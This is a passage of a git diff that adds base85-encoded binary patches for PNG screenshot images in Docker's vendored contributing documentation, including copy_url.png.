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
VbC@T9_9*}W002ovPDHLkV1mCih?W2V

literal 0
HcmV?d00001

diff --git a/vendor/github.com/docker/docker/docs/contributing/images/copy_url.png b/vendor/github.com/docker/docker/docs/contributing/images/copy_url.png
new file mode 100644
index 0000000000000000000000000000000000000000..82df4eec50d8734ce416cd0853dbcda1441a8514
GIT binary patch
literal 69486
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
